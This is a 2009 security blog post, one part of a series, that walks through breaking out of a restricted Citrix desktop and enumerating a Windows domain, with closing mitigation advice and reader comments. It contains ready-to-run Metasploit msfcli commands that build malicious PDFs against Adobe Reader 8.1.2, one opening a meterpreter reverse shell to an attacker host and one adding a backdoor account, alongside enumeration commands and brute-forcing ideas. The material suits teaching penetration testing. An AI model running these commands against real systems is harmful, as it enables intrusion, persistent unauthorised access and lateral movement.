Thursday, March 26, 2009

Abusing Citrix - Part 4

In this post I’ll be working against a pretty restricted remote desktop. I have once again locked down the desktop to the degree that it’s pretty unusable. I have notepad and I.E available to me, and I.E is apparently locked to the company homepage.

My goal is to bypass the restrictions and perform a little network enumeration, hopefully using the server for my own evil intentions rather than what it is intended for.

I start off by checking out the website that I can get to, looking for links out to the internet. Unfortunately I don’t find anything too useful there. It’s all very web 1.0. The admin has removed the address bar and nearly all the menu options. Most of what I would normally use to extend my reach into the server has been restricted and just hit’s me with a Restrictions dialogue window.

I carry on looking for chinks in the amour and start to find a few things that may have been missed in the group policy. What you have to remember is that there are thousands of settings in the group policies and if they are not set up properly a seemingly irrelevant setting may lead to something useful to the attacker.

Here I see the Folders option has been left available.

And this allows me to go on to browse a list of available hosts on the network. What use is that you say?

Well it gives me potential targets which may come in handy in later phases of my attack. Also if I start to see computers called Test-Server or Dev-Server I might want to take a closer look at them in particular.

I also see that the Print menu option has been left available.

Again, because this hasn’t been restricted I can use this to my advantage. Even though the admin has removed the help from the menus in Notepad and I.E lucky for me Microsoft provide plenty of links to help elsewhere in the OS.

And again I can use links in the help pages to get back to a page which does give me the address bar that I want.

And if I can browse out from there I can get to my tools.

But what tools do I really need? Well at the moment I should really find out a little more about the network so when I do download the tools I get just the ones I need to make my job of erasing tracks that little bit easier.

Even though the admin has taken away all the drive mappings as long as I can find somewhere writable I can easily create a batch file to launch a command shell with notepad. Once I have my shell things get even more interesting.

And because I can browse about a bit easier I can run my batch file and launch the shell.

Oh that’s handy, using the net command I can see how I need to tailor any brute-force attempts to avoid locking out accounts. As we have seen, so far I have been able to look at a list of available computers and the password policy.

I could use “net user /domain >userlist.txt ” to get myself a list of accounts on the domain. I know that I can run commands from the command line and create and execute batch files so from there I can write a simple FOR loop to bring a little password brute-forcing to the party. But for now let’s not get carried away and carry on with our Citrix fun.

So I have a list of users, computers, security settings, what would be nice would be software versions. Well I can easily see what the Notepad and I.E versions are. From my handy shell I can even use the “SystemInfo” command to see what hotfixes are applied.

The thing is, because this server is in a particular hostile environment it “should” be patched to the hilt. What would be nice would be to see what third-party software is installed. Of course we can’t browse the C: drive through windows, but we can through DOS.

And what do we have here? Adobe Acrobat Reader. Even though it’s been removed from my menus I can launch it through the shell and check it’s version.

Oh look at that. Version 8.1.2. I have a little Metasploit goodness for that.

Maybe I could create a pdf that will connect back to a listener and give you a meterpreter session which will use the citrix host as a pivot point to through exploits at the softer targets:

./msfcli exploit/windows/fileformat/adobe_utilprintf filename=SiteDirections.pdf payload=windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=6666 E

Or knowing that it’s likely that the version of Acrobat is the same elsewhere in the organisation, tailor a pdf to create an account on this or another system. And give it an enticing name that most (male) sys admins will struggle to ignore.

./msfcli exploit/windows/fileformat/adobe_utilprintf filename=BritneyDoesParis.pdf payload=windows/adduser user=System-Backup pass=Password123 E

Anyway, there I am going of topic again, back to my remote desktop.

Assuming that we don’t find a vulnerable third party apps, what else can I do from this restricted user locked down to the hilt desktop? Well we all know how useful MMC’s are, from the printing help menu that I got to earlier I can search for one and what do you know?

Lunch the MMC from the handy shortcut that’s provided, add a few snap-ins here and there and my restricted user Bob is starting to feel a little more comfortable in his “locked down” desktop.

Not many admins would be comfortable with restricted users having access to this level of information I imagine.

Speaking of desktops…

oh my......

The possibilities are endless.

So that’s all for this post. I just want to finish by saying that these weaknesses can be mitigated by strong group policies and restrictions, but in my opinion the admin who creates these does need to think like the attacker and use multiple layers of defence. Group policies need to be coupled with a good patching regime (OS and 3rd party) and a strong degree of least privilege. It’s also important to remember that every single system on the network is important, not just the servers.

If you got this far thanks for reading.

Here’s just a few useful keyboard shortcuts that might help you in your Citrix/Remote Desktop adventures.

Windows Shortcuts

SHIFT+F1 = Local Task List
SHIFT+F2 = Toggle Title Bar
SHIFT+F3 =Close Remote Application
CTRL+F1 = Displays Windows Security Desktop – Ctrl+Alt+Del
CTRL+F2 = Remote Task List
CTRL+F3 = Remote Task Manager –Ctrl+Shift+ESC
ALT+F2 = Cycle through programs

I.E Shortcuts

Ctrl + h = View History
Ctrl +i = View Favorites
Ctrl + t = New Tab (I.E 7)
Ctrl + n = New Window
Ctrl + o = Internet Address (browse feature)
Ctrl + n = New Browser
Ctrl + p = Print (to file)
Right Click (Shift + F10)
Save Image As
View Source
F1 = Help (and of the jump to URL as mentioned in Part 1)


Mike said...

Wow, GREAT series of posts, Syn. Much thanks, and I look forwards to reading more.

SynJunkie said...

As always cheers Mike.

CG said...

great set of posts SYN!

SynJunkie said...

Thanks Chris.

Mastiff said...

Great blogg very nice and intresting articles. I have question regarding your citrix articles. In a normal situation the user will only have user priviliges in the system. Even if he/she find a way to fire up a cmd prompt, it will run with same priviliges as the user right ? Is there any easy ways for the user to elevate priviliges ? If there is how should an attack like that look like ??

SynJunkie said...

Hi Mastiff

You are absolutely right, the cmd propmpt will run under the same user account as the user launching it.

My reasoning behind getting to a DOS prompt is this. The citrix sessions that I have demonstrated here are all locked down to some degree to prevent the user from either getting to parts of the OS/file system that he doesn't need access to, or to prevent him from getting to other files/drives that he doesn't need access to. By getting to a cmd prompt I can either get to files that are not secured by an ACL or I can get to my own files that are say reverse meterpreter payloads that have been encoded to bypass AV or are priv escalation exploits.

Also if the OS is not secured properly I can escalate my privileges as show in my 1st posting in June "Getting closer to god with privilege escalation".

Hope this helps.


Saint Patrick said...

Great collection of posts. Nice examples/screenshots. Keep it up.